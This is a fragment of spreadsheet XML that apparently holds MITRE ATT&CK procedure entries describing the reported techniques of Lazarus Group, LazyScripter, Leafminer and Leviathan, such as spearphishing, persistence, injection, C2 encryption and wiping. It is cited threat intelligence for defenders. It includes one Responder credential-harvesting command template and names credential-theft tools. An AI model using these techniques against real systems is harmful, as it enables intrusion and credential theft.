  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has exfiltrated stolen data to Dropbox using a customized version of dbxcli.(Citation: ESET Lazarus Jun 2020)(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used multiple proxies to obfuscate network traffic from victims.(Citation: US-CERT FALLCHILL Nov 2017)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware SierraAlfa sends data to one of the hard-coded C2 servers chosen at random, and if the transmission fails, chooses a new C2 server to attempt the transmission again.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware has deleted files in various ways, including "suicide scripts" to delete malware binaries from the victim. [Lazarus Group](https://attack.mitre.org/groups/G0032) also uses secure file deletion to delete files from the victim.(Citation: Novetta Blockbuster)(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>Several [Lazarus Group](https://attack.mitre.org/groups/G0032) has conducted word searches on compromised machines to identify specific documents of interest. [Lazarus Group](https://attack.mitre.org/groups/G0032) malware can use a common function to identify target files by their extension, and some also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives.(Citation: Novetta Blockbuster)(Citation: McAfee GhostSecret)(Citation: ClearSky Lazarus Aug 2020)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has studied publicly available information about a targeted organization to tailor spearphishing efforts against specific departments and/or individuals.(Citation: ESET Lazarus Jun 2020)(Citation: ClearSky Lazarus Aug 2020)(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used a VBA Macro to set its file attributes to System and Hidden and has named files with a dot prefix to hide them from the Finder application.(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has targeted specific individuals within an organization with tailored job vacancy announcements.(Citation: ESET Lazarus Jun 2020)(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has restored malicious [KernelCallbackTable](https://attack.mitre.org/techniques/T1574/013) code to its original state after the process execution flow has been hijacked.(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) persistence mechanisms have used &lt;code&gt;forfiles.exe&lt;/code&gt; to execute .htm files.(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has downloaded files, malware, and tools from its C2 onto a compromised host.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: Novetta Blockbuster Loaders)(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)(Citation: ClearSky Lazarus Aug 2020)(Citation: Kaspersky ThreatNeedle Feb 2021)(Citation: McAfee Lazarus Jul 2020)(Citation: ESET Lazarus Jun 2020)(Citation: Google TAG Lazarus Jan 2021)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)(Citation: ESET Twitter Ida Pro Nov 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) replaced the background wallpaper of systems with a threatening image after rendering the system unbootable with a [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002).(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used a compromised router to serve as a proxy between a victim network's corporate and restricted segments.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has conducted internal spearphishing from within a compromised organization.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has abused the &lt;code&gt;KernelCallbackTable&lt;/code&gt; to hijack process control flow and execute shellcode.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware KiloAlfa contains keylogging functionality.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Tools)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) executed [Responder](https://attack.mitre.org/software/S0174) using the command &lt;code&gt;[Responder file path] -i [IP address] -rPv&lt;/code&gt; on a compromised host to harvest credentials and move laterally.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has attempted to get users to launch a malicious Microsoft Word attachment delivered via a spearphishing email.(Citation: McAfee Bankshot)(Citation: ClearSky Lazarus Aug 2020)(Citation: Kaspersky ThreatNeedle Feb 2021)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has sent spearphishing emails in an attempt to lure users to click on a malicious link.(Citation: ESET Lazarus Jun 2020)(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has developed custom malware for use in their operations.(Citation: CISA AppleJeus Feb 2021)(Citation: ESET Lazarus Jun 2020)(Citation: Google TAG Lazarus Jan 2021)(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used a scheduled task named `SRCheck` to mask the execution of a malicious .dll.(Citation: ESET Twitter Ida Pro Nov 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has disguised malicious template files as JPEG files to avoid detection.(Citation: McAfee Lazarus Jul 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has renamed malicious code to disguise it as Microsoft's narrator and other legitimate files.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)(Citation: ESET Lazarus Jun 2020)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used &lt;code&gt;mshta.exe&lt;/code&gt; to execute HTML pages downloaded by initial access documents.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used multi-stage malware components that inject later stages into separate processes.(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used the Windows API &lt;code&gt;ObtainUserAgentString&lt;/code&gt; to obtain the User-Agent from a compromised host to connect to a C2 server.(Citation: McAfee Lazarus Jul 2020) [Lazarus Group](https://attack.mitre.org/groups/G0032) has also used various, often lesser known, functions to perform various types of Discovery and [Process Injection](https://attack.mitre.org/techniques/T1055).(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used nmap from a router VM to scan ports on systems within the restricted segment of an enterprise network.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>Some [Lazarus Group](https://attack.mitre.org/groups/G0032) malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used multiple types of encryption and encoding for their payloads, including AES, Caracachs, RC4, XOR, Base64, and other tricks such as creating aliases in code for [Native API](https://attack.mitre.org/techniques/T1106) function names.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: TrendMicro macOS Dacls May 2020)(Citation: ESET Lazarus Jun 2020)(Citation: McAfee Lazarus Jul 2020)(Citation: McAfee Lazarus Nov 2020)(Citation: ClearSky Lazarus Aug 2020)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used PowerShell to execute commands and malicious code.(Citation: ESET Lazarus Jun 2020)(Citation: Google TAG Lazarus Jan 2021)</t>
  </si>
  <si>
    <t>Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families gather a list of running processes on a victim system and send it to their C2 server. A Destover-like variant used by [Lazarus Group](https://attack.mitre.org/groups/G0032) also gathers process times.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: McAfee GhostSecret)(Citation: TrendMicro macOS Dacls May 2020)(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, potentially evading SSL traffic inspection/decryption.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop. Another [Lazarus Group](https://attack.mitre.org/groups/G0032) malware sample checks for the presence of the following Registry key:&lt;code&gt;HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt&lt;/code&gt;.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee Lazarus Resurfaces Feb 2018)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has changed memory protection permissions then overwritten in memory DLL function code with shellcode, which was later executed via [KernelCallbackTable](https://attack.mitre.org/techniques/T1574/013) hijacking. [Lazarus Group](https://attack.mitre.org/groups/G0032) has also used shellcode within macros to decrypt and manually map DLLs into memory at runtime.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has maintained persistence by loading malicious code into a startup folder or by adding a Registry Run key.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: McAfee Lazarus Jul 2020)(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used rgsvr32 to execute custom malware.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware SierraCharlie uses RDP for propagation.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has renamed system utilities such as &lt;code&gt;wscript.exe&lt;/code&gt; and &lt;code&gt;mshta.exe&lt;/code&gt;.(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used rundll32 to execute malicious payloads on a compromised host.(Citation: McAfee Lazarus Jul 2020)(Citation: ESET Lazarus Jun 2020)(Citation: ESET Twitter Ida Pro Nov 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware SierraAlfa accesses the &lt;code&gt;ADMIN$&lt;/code&gt; share via SMB to conduct lateral movement.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) used SSH and the PuTTy PSCP utility to gain access to a restricted segment of a compromised network.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used &lt;code&gt;schtasks&lt;/code&gt; for persistence including through the periodic execution of a remote XSL script or a dropped VBS payload.(Citation: ESET Lazarus Jun 2020)(Citation: Qualys LolZarus)(Citation: ESET Twitter Ida Pro Nov 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has acquired servers to host their malicious tools.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has compromised servers to stage malicious tools.(Citation: Kaspersky ThreatNeedle Feb 2021)(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)(Citation: McAfee Lazarus Jul 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has stopped the MSExchangeIS service to render Exchange contents inaccessible to users.(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware has maintained persistence on a system by creating a LNK shortcut in the user’s Startup folder.(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used LinkedIn to identify and target specific employees within a chosen organization.(Citation: ESET Lazarus Jun 2020)(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has created new LinkedIn and Twitter accounts to conduct social engineering against potential victims.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)(Citation: Google TAG Lazarus Jan 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used Themida to pack malicious DLLs and other files.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has targeted victims with spearphishing emails containing malicious Microsoft Word documents.(Citation: McAfee Bankshot)(Citation: Kaspersky ThreatNeedle Feb 2021)(Citation: McAfee Lazarus Jul 2020)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has sent malicious links to victims via email.(Citation: Kaspersky ThreatNeedle Feb 2021)(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used social media platforms, including LinkedIn and Twitter, to send spearphishing messages.(Citation: Google TAG Lazarus Jan 2021)(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>A [Lazarus Group](https://attack.mitre.org/groups/G0032) malware sample encodes data with base64.(Citation: McAfee Lazarus Resurfaces Feb 2018)</t>
  </si>
  <si>
    <t>Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another [Lazarus Group](https://attack.mitre.org/groups/G0032) malware sample XORs C2 traffic. Other [Lazarus Group](https://attack.mitre.org/groups/G0032) malware uses Caracachs encryption to encrypt C2 payloads. [Lazarus Group](https://attack.mitre.org/groups/G0032) has also used AES to encrypt C2 traffic.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: McAfee GhostSecret)(Citation: McAfee Lazarus Jul 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) lnk files used for persistence have abused the Windows Update Client (&lt;code&gt;wuauclt.exe&lt;/code&gt;) to execute a malicious DLL.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used tools to detect sandbox or VMware services through identifying the presence of a debugger or related services.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by [Lazarus Group](https://attack.mitre.org/groups/G0032) also collects disk space information and sends it to its C2 server.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: McAfee GhostSecret)(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware IndiaIndia obtains and sends to its C2 server information about the first network interface card’s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used &lt;code&gt;net use&lt;/code&gt; to identify and establish a network connection with a remote host.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>Various [Lazarus Group](https://attack.mitre.org/groups/G0032) malware enumerates logged-on users.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: SentinelOne Lazarus macOS July 2020)(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has rebooted systems after destroying files and wiping the MBR on infected systems.(Citation: US-CERT SHARPKNOT June 2018)</t>
  </si>
  <si>
    <t>A Destover-like implant used by [Lazarus Group](https://attack.mitre.org/groups/G0032) can obtain the current system time and send it to the C2 server.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used DOCX files to retrieve a malicious document template/DOTM file.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)</t>
  </si>
  <si>
    <t>Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has obtained a variety of tools for their operations, including [Responder](https://attack.mitre.org/software/S0174), PuTTy PSCP, Wake-On-Lan, ChromePass, and dbxcli.(Citation: ESET Lazarus Jun 2020)(Citation: ClearSky Lazarus Aug 2020)(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has hosted malicious files on compromised as well as [Lazarus Group](https://attack.mitre.org/groups/G0032)-controlled servers.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has hosted custom and open-source tools on compromised as well as [Lazarus Group](https://attack.mitre.org/groups/G0032)-controlled servers.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used administrator credentials to gain access to restricted network segments.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used VBA and embedded macros in Word documents to execute malicious code.(Citation: McAfee Lazarus Jul 2020)(Citation: ClearSky Lazarus Aug 2020)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has conducted C2 over HTTP and HTTPS.(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)(Citation: McAfee Lazarus Jul 2020)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)(Citation: ESET Twitter Ida Pro Nov 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has hosted malicious downloads on Github and Dropbox.(Citation: CISA AppleJeus Feb 2021)(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware uses cmd.exe to execute commands on a compromised host.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: US-CERT SHARPKNOT June 2018)(Citation: Qualys LolZarus) A Destover-like variant used by [Lazarus Group](https://attack.mitre.org/groups/G0032) uses a batch file mechanism to delete its binaries from the system.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used WMIC for discovery as well as to execute payloads for persistence and lateral movement.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)(Citation: ClearSky Lazarus Aug 2020)(Citation: Kaspersky ThreatNeedle Feb 2021)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families install themselves as new services.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t xml:space="preserve">[Lazarus Group](https://attack.mitre.org/groups/G0032) has used WMIC to execute a remote XSL script to establish persistence.(Citation: ESET Lazarus Jun 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[LazyScripter](https://attack.mitre.org/groups/G0140) has leveraged dynamic DNS providers for C2 communications.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has used dynamic DNS providers to create legitimate-looking subdomains for C2.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) had downloaded additional tools to a compromised host.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[LazyScripter](https://attack.mitre.org/groups/G0140) has used JavaScript in its attacks.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has lured users to open malicious email attachments.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has relied upon users clicking on links to malicious files.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has used a variety of open-source remote access Trojans for its operations.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[LazyScripter](https://attack.mitre.org/groups/G0140) has used several different security software icons to disguise executables.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[LazyScripter](https://attack.mitre.org/groups/G0140) has used `mshta.exe` to execute [Koadic](https://attack.mitre.org/software/S0250) stagers.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has leveraged the BatchEncryption tool to perform advanced batch obfuscation and encoding techniques.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has used PowerShell scripts to execute malicious code.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has achieved persistence via writing a PowerShell script to the autorun registry key.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[LazyScripter](https://attack.mitre.org/groups/G0140) has used `rundll32.exe` to execute [Koadic](https://attack.mitre.org/software/S0250) stagers.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has used spam emails weaponized with archive or document files as its initial infection vector.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has used spam emails that contain a link that redirects the victim to download a malicious document.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has hosted open-source remote access Trojans used in its operations in GitHub.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has used VBScript to execute malicious code.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[LazyScripter](https://attack.mitre.org/groups/G0140) has used GitHub to host its payloads to operate spam campaigns.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has established GitHub accounts to host its toolsets.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has used batch files to deploy open-source and multi-stage RATs.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) used several tools for retrieving login and password information, including LaZagne.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) has infected victims using watering holes.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) used a tool called MailSniper to search for files on the desktop and another utility called Sobolsoft to extract attachments from EML files.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) infected victims using JavaScript code.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) used several tools for retrieving login and password information, including LaZagne and Mimikatz.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) used a tool called Imecab to set up a persistent remote access account on the victim machine.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) scanned network services to search for vulnerabilities in the victim system.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) obfuscated scripts that were used on victim machines.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) used a tool called Total SMB BruteForcer to perform internal password spraying.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Leafminer](https://attack.mitre.org/groups/G0077) has used [Process Doppelgänging](https://attack.mitre.org/techniques/T1055/013) to evade security software while deploying tools on compromised systems.(Citation: Symantec Leafminer July 2018)	</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) used a tool called MailSniper to search through the Exchange server mailboxes for keywords.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) used Microsoft’s Sysinternals tools to gather detailed information about remote systems.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) has obtained and used tools such as [LaZagne](https://attack.mitre.org/software/S0349), [Mimikatz](https://attack.mitre.org/software/S0002), [PsExec](https://attack.mitre.org/software/S0029), and [MailSniper](https://attack.mitre.org/software/S0413).(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has archived victim's data prior to exfiltration.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used [BITSAdmin](https://attack.mitre.org/software/S0190) to download additional tools.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has inserted garbage characters into code, presumably to avoid anti-virus detection.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
